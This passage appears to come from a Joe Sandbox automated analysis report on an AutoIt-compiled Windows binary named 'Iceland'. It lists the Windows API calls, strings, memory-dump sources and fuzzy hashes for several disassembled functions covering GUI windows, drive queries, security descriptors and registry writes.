                                                                                                                                                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                • Opcode ID: a748b40788b366a457248d18641e8b028921dd7f4dcab226ee0f654481e63438
                                                                                                                                                                                                                                                                • Instruction ID: ede74a6747303756f1c05d89e0f1282638b0d2dc4b61a3d5be0d8865f18ad416
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a748b40788b366a457248d18641e8b028921dd7f4dcab226ee0f654481e63438
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73A16C72008301AFD711DFA4DC48EABBBA9FF89324F100B19FA62961E2E771D945DB51
                                                                                                                                                                                                                                                                Function 00A21625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?), ref: 00A216B4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A62B07
                                                                                                                                                                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A62B40
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A62F85
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A21488,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A21865
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001053), ref: 00A62FC1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A62FD8
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A62FEE
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A62FF9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: b43a9c867b56453fa24ef3d6696c517ccbc6f251f449c0795adcec19d8d374a3
                                                                                                                                                                                                                                                                • Instruction ID: 80435f70f699e769758e4a089240e60e44697912e56a745aea47444ab3a48abf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b43a9c867b56453fa24ef3d6696c517ccbc6f251f449c0795adcec19d8d374a3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5112CD30600A11EFDB25CF58D884BB9BBF5FB54300F184669F4959B662C772ED82CB91
                                                                                                                                                                                                                                                                Function 00AA316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00AA319B
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AA32C7
                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00AA3306
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AA3316
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00AA335D
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AA3369
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00AA33B2
                                                                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AA33C1
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AA33D1
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00AA33D5
                                                                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00AA33E5
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA33EE
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00AA33F7
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AA3423
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AA343A
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00AA347A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AA348E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AA349F
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00AA34D4
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AA34DF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AA34EA
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00AA34F4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                • Opcode ID: 056831465b4b77dabdf2244830c9403b02db52c483458a691891a7f3bc45fff6
                                                                                                                                                                                                                                                                • Instruction ID: 7eeb3053b197f3fdef694442e143ef73ed72ba66d71013c28265221daa5a35b5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 056831465b4b77dabdf2244830c9403b02db52c483458a691891a7f3bc45fff6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B13DB1A00215BFEB14DFA8DD45FAE7BA9EB09710F004214F915EB2E1D774AD41CB90
                                                                                                                                                                                                                                                                Function 00A95524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00A95532
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,00ABDC30,?,\\.\,00ABDCD0), ref: 00A9560F
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00ABDC30,?,\\.\,00ABDCD0), ref: 00A9577B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                • Opcode ID: adaaba02c601a6b0549f17445aa717dd332c55f4c9477aa6f3c3410aa97434c8
                                                                                                                                                                                                                                                                • Instruction ID: 5556ed7c42bcfda07e2c0e0bc064aafb83c19d00a6d844f5ebee4269db9c01f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adaaba02c601a6b0549f17445aa717dd332c55f4c9477aa6f3c3410aa97434c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30618C30F48945EBCF2ADF79EE928BC73F1BF54350B244825E406AB291DA319E42CB51
                                                                                                                                                                                                                                                                Function 00AB1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AB1BC4
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AB1BD9
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AB1BE0
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB1C35
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00AB1C55
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AB1C89
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AB1CA7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AB1CB9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 00AB1CCE
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AB1CE1
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 00AB1D3D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AB1D58
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AB1D6C
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AB1D84
                                                                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00AB1DAA
                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00AB1DC4
                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 00AB1DDB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 00AB1E46
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                • Opcode ID: c7774e7e8c8595d42d40aa9a9dbfd0b43a5731e4df6070ca2786ebd41f387f15
                                                                                                                                                                                                                                                                • Instruction ID: 35c17ad11a2be9c81dca02ebf917799ee335d43fa04dca1b061b6423b97fcde5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7774e7e8c8595d42d40aa9a9dbfd0b43a5731e4df6070ca2786ebd41f387f15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FB18E71604301AFD714DF68C994BAABBE9FF84310F408A1CF5999B2A2D731E845CB92
                                                                                                                                                                                                                                                                Function 00AB0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AB0D81
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0DBB
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0E25
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0E8D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB0F11
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AB0F61
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AB0FA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FD52: _wcslen.LIBCMT ref: 00A3FD5D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A82BA5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A82BD7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                • Opcode ID: cf2ec56504a900553ec8813e43240f3be4de686fdc120332a62b5840929a1aac
                                                                                                                                                                                                                                                                • Instruction ID: cfc0c6a837baf34b37c842ae5d304aa31681aeea5477f590cd95c5d8abcf1e18
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf2ec56504a900553ec8813e43240f3be4de686fdc120332a62b5840929a1aac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EE1B0312082418FC714EF28CA519BBB3EABF88354F54496CF4969B3A2DB34ED45CB91
                                                                                                                                                                                                                                                                Function 00A22521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A225F8
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00A22600
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A2262B
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00A22633
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00A22658
                                                                                                                                                                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A22675
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A22685
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A226B8
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A226CC
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00A226EA
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A22706
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A22711
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetCursorPos.USER32(?), ref: 00A219E1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: ScreenToClient.USER32(00000000,?), ref: 00A219FE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000001), ref: 00A21A23
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000002), ref: 00A21A3D
                                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00A2199C), ref: 00A22738
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                • Opcode ID: f88ab3d4ba0d0365df75fd53fd305bda23b689d13e210de9ce45f8d8d0a55c4d
                                                                                                                                                                                                                                                                • Instruction ID: e41b5258d53dc34ceb941f6f8f72c09f83feeb2813ee9b78d7cf43346bb65060
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f88ab3d4ba0d0365df75fd53fd305bda23b689d13e210de9ce45f8d8d0a55c4d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31B16B36A00209AFDF14DFA8DD95BAE7BB4FB48314F104229FA15A72A0DB74D942CF50
                                                                                                                                                                                                                                                                Function 00A816D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A81A60
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A6C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A82
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A81A99
                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A81741
                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A81775
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A8178C
                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00A817C6
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A817E2
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A817F9
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A81801
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A81808
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A81829
                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00A81830
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A8185F
                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A81881
                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A81893
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A818BA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818C1
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A818CA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818D1
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A818DA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818E1
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A818ED
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A818F4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: GetProcessHeap.KERNEL32(00000008,00A814FD,?,00000000,?,00A814FD,?), ref: 00A81AED
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A814FD,?), ref: 00A81AF4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A814FD,?), ref: 00A81B03
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                • Opcode ID: 0829c41afc6b05984a20c0d4d67c221a8fb142c3575ae883e582c2be2dc27d4c
                                                                                                                                                                                                                                                                • Instruction ID: 6375004c58e42ba2990e931a2237f1c3f2292b6b95cf5540a62f81abc92ea754
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0829c41afc6b05984a20c0d4d67c221a8fb142c3575ae883e582c2be2dc27d4c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05713EB2D00209ABDF10EFE5EC45FAEBBBCBF44350F144225F915A61A1E7319906CB61
                                                                                                                                                                                                                                                                Function 00AACE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AACF1D
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ABDCD0,00000000,?,00000000,?,?), ref: 00AACFA4
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00AAD004
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AAD054
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AAD0CF
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00AAD112
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00AAD221
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00AAD2AD
